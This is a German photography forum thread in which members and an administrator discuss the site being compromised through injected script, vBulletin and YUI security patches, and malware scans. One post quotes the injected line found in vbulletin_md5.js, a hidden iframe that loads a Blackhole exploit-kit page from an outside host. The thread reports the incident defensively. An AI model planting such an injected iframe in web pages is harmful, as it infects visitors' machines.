• Neuer Gutscheincode unseres Partners Schutzfolien24:
    DSLR-Forum2025
    Dauerhaft 10% Rabatt auf alle Displayschutzfolien und Schutzgläser der Eigenmarken
    "Upscreen", "Screenleaf", BROTECT" und "Savvies".
    Der Code ist für alle Geräteklassen gültig.
  • Stimmt ab über die Sieger des DSLR-Forum Fotowettbewerbs September 2025.
    Thema: "Straßenfotografie s/w"

Nur noch bis zum 30.09.2025 23:59!
    Jeder darf abstimmen!
    Zur Abstimmung und Bewertung hier lang
  • Ich freue mich bekannt geben zu können, dass das DSLR-Forum einen neuen Aktionspartner gewinnen konnte.

Saal Digital bietet Fotoprodukte in HighEnd-Qualität.
    Für die Mitglieder des DSLR-Forums locken Rabatte und Sonderaktionen!
    Alle Informationen dazu sowie ein tolles Einstiegsangebot unseres neuen Kooperationspartners gibt es hier.
  • In eigener Sache!

Liebe Mitglieder, liebe Besucher und Gäste
    ich weiß, es ist ein leidiges Thema, aber ich muss es ansprechen: Werbung, Werbeblocker und Finanzierung des Forums.
    Bitte hier weiterlesen ...

• Nicht erreichbare Adressen im Benutzerkonto
    Wir bekommen zurzeit eine große Anzahl an E-Mails, die das System zum Beispiel als Benachrichtigungen an Nutzer verschickt,
    als unzustellbar zurück, weil z.B. die Adressen nicht erreichbar sind oder das Postfach gar nicht existiert.
    Stellt doch bitte sicher, dass die Benachrichtigungen, die ihr vom System erwartet, auch zugestellt werden können.
    Nicht erreichbare E-Mail-Adressen sind dazu wenig hilfreich.
    Danke!
WERBUNG

Forum schon wieder verseucht ?

Status
Für weitere Antworten geschlossen.
Also die Infektion findet über einen eingeschleusten IFrame statt, der über das Java-Plugin einen Dropper nachlädt.

Das Problem mit dem iframe hatte es ja schon vor ein paar Wochen einmal gegeben. Bei Opera kann man iframes generell oder für bestimmte Websites deaktiveren. Für das dslr-forum braucht man iframes sowieso nicht.

Jedenfalls bei denen, die das Problem vor ein paar Wochen mitbekommen haben, verstehe ich das nicht. Man greift ja auch nicht ein zweites Mal auf eine heiße Herdplatte.

Ich bin übrigends froh über einen Hacker der die Fehler mitteilt und die Chance gibt dies zu ändern. Besser das als einer der die Userdaten klaut.

Gerade weil dieses Forum jetzt Kommerzialisiert wird mit Werbung etc. denke ich auch dass man erwarten kann, dass auf das Aktuelle Vbulletin Upgedatet wird. Die neue Forenleitung hat seine Hausaufgaben einfach nicht gemacht. schade!

snoozer, sorry, was?

(A) Der obere Quote war aus einem anderen Forum, ein anderes Forum betreffend.
(B) Was wird denn hier kommerzialisiert? Der Banner ist länger als ich da und andere Foren (wie zB experts-exchange.com) sind da ein klares Stück weiter als hier, dort kannst Du die Antwort NUR lesen, wenn Du schön Deine Mitgliedschaft zahlst.

mfg chmee

Gerade weil dieses Forum jetzt Kommerzialisiert wird mit Werbung etc.

Es ist nicht mehr Werbung im Forum als vor dem 15.3.

denke ich auch dass man erwarten kann, dass auf das Aktuelle Vbulletin Upgedatet wird. Die neue Forenleitung hat seine Hausaufgaben einfach nicht gemacht. schade!

Wir haben vor wenigen Minuten ein brandaktuelles Sicherheitsupdate eingespielt. Die hier genutzte Software ist damit auf dem aktuellen Stand.
VB4 ist eine andere Software. ;)
Übrigens: Den Sicherheitspatch gibt es auch für VB4.x, welches dieselbe Lücke aufgewiesen hat. Es sind somit alle Versionen 3.x und 4.x betroffen.
Betroffen sind Dateien des YUI (Yahoo User Interface), wie bei den Attacken der letzten Wochen vermutet, aber von VB bestritten. ;)

Zuletzt bearbeitet:
Hallo!

Bei mir ist nichts verseucht, ich habe sogar extra noch einen großen Scan gefahren, völlig ohne Ergebnis!

Gruß

Jörg-Peter

Wir haben vor wenigen Minuten ein brandaktuelles Sicherheitsupdate eingespielt. Die hier genutzte Software ist damit auf dem aktuellen Stand.
Also wenn ich das, das und das (modifiziert: Dienstag, 26. Oktober 2010) richtig verstanden habe, sollte das Problem bei vBulletin eigentlich schon mehrere Monate lang bekannt sein, und zwar mindestens seit eben dem 26. Oktober 2010.

Sollte das wirklich der Fall sein, und sollten die bei vBulletin wirklich diesen Sicherheitshinweis von YUI (passt genau auf die Forumsprobleme: "JavaScript injection exploits") erst jetzt wahrgenommen, bzw. bis jetzt ignoriert haben, dann wäre das schon ein kleiner Skandal.

Nachtrag/Nachfrage: Oder war vBulletin 3.8.7 schon vorher auf dem Stand von YUI 2.8.2 bzw. 2.9? Dann bitte meinen Post ignorieren. War auf 2.7, siehe Antwort von scorpio.

Zuletzt bearbeitet:
Wenn das bei Euch alles so verseucht sein sollte, wieso ist dann mein Computer nicht verseucht?

@scorpio: Noch eine Kleinigkeit: Ich habe gerade meinen Vorpost editiert und dabei gemerkt, dass offenbar beim Update-Einspielen (?) der Button "S" (Durchstreichen) aus dem Editor verschwunden ist. Der war ja irgendwie händisch "customized" oder so, richtig?

Vergiss es, ich war zu blöd zum Hingucken! :o:o:o

Das ist jetzt ein ABC-Button :cool:

Zuletzt bearbeitet:
Hallo,

habe jetzt den mal drüber laufen gelassen

Rootkit (TDSS)

nichts gefunden -> Kiste scheint sauber,

aber trauen tu ich iohr im Moment immer noch nicht

Ich brings jetzt mal hoffentlich zum Abschluss.

Danke an alle , die so schnell reagiert haben mit ihren Infos und Tipps.
Das ist doch auch etwas schönes an einem Forum -> ein gemeinsames Interssengebiet meist Hobby und dahinter viele Spezialisten auf anderen Gebieten.

mfg Klaus

Nanu? Es geht wieder los! vbulletin_md5.js ist wieder manipuliert worden. Am Ende steht:
Code:
document.write('<iframe src="http://hot-nike.co.be/vfe.php?vwq=ca11b58a4be224e8" width="1" height="1" frameborder="0"></iframe>');
Laut FF ist das vor knapp einer Stunde passiert: Änderungsdatum der Datei: 6. Juni 2011 23:39:17.

NIS meldet das als "Ein Eindringversuch von hot-nike.co.be wurde blockiert.", "Web Attack: Blackhole Toolkit Website 7", hot-nike.co.be/vfe.php?vwq=ca11b58a4be224e8

Und das trotz Patch? Da muss noch irgendeine andere Lücke sein.

Zuletzt bearbeitet:
auf welchen Systemen liegt denn eigentlich die Datei vbulletin_md5.js ?
Sie gehört ja anscheinend zum vBulletin und müßte doch dann auf Rüdigers
Systemen liegen, oder ?

@TorstenB: Ach naja, man macht sich ne Liste von vBulletin-Foren, vornehmlich jene mit mehr als 1.000 Usern und lässt sein Script immer wieder nachschauen, ob man reinkommt und die Datei weiterhin verseucht ist..

vBulletin angreifbar wo?

http://search.securityfocus.com/sws...earch!&metaname=alldoc&sort=swishlastmodified

Bitte auch im englischen vBulletin-Forum nachlesen, da sind 3(!) Probleme in den letzten 24 Stunden angesprochen worden..

Langsam mach ich mir aber auch Gedanken, ob andere Dinge nicht in Ordnung sind.. Schwache Passwörter für den SSH-oder FTP-Zugriff, versehentlich aktive guest/anonym-Konten..

mfg chmee

Zuletzt bearbeitet:
Nanu? Es geht wieder los! vbulletin_md5.js ist wieder manipuliert worden.

Ist mir eben beim Login auch sofort aufgefallen

hot-niked7cr.jpg

Oh weh!

Ich habe gestern abend sogar bei Rüdiger angerufen, weil mein Rechner von dem
Security-protection-Sch... völlig blockiert war.

Aber er hat bestimmt letzte Nacht schon nicht geschlafen.....

Status
Für weitere Antworten geschlossen.
WERBUNG
Zurück
Oben Unten